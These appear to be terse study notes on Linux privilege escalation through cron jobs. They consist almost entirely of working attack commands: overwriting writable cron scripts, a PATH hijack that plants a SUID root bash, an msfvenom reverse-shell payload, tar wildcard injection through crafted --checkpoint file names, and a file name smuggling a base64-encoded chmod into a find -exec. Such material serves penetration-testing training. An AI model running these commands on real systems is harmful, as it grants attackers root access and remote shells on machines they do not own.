LSE
./lse.sh -l 1 -i | more
File permissions
View the Content of system wide crons
cat /etc/crontabLocate the file that is running as part of crontab
locate filename
Check the permission of the file
ls -l filenameChange the content of the file if there is write access
#! /bin/bash
revershell here
PATH Environment variable
- The crontab PATH environment variable is by default set to /usr/bin:/bin..
- The PATH variable can be overwritten in the crontab file.
- If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.
View the contents of the system-wide crontab:
Note that the /home/user directory (which we can write to) is at the start of the PATH variable, and the first cron job does not use an absolute path.
Exploit
- Create the file overwrite.sh in /home/user with the following contents:
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
chmod +x /tmp/rootbash- Make it executable
chmod +x /home/user/overwrite.sh- Once the /tmp/rootbash file is created, execute it (with -p to preserve the effective UID) to gain a root shell:
cd /tmp
./rootbash –pWildcards
-
View the contents of the system-wide crontab
-
Use msfvenom to create a reverse shell ELF payload:
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=53 -f elf -o shell.elf- Copy the file to the /home/user directory on the remote host and make it executable:
chmod +x /home/user/shell.elf- Create two files in the /home/user directory:
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
Find -exec
touch /dev/shm/'$(echo -n Y2htb2QgdStzIC9iaW4vYmFzaA==|base64 -d|bash)'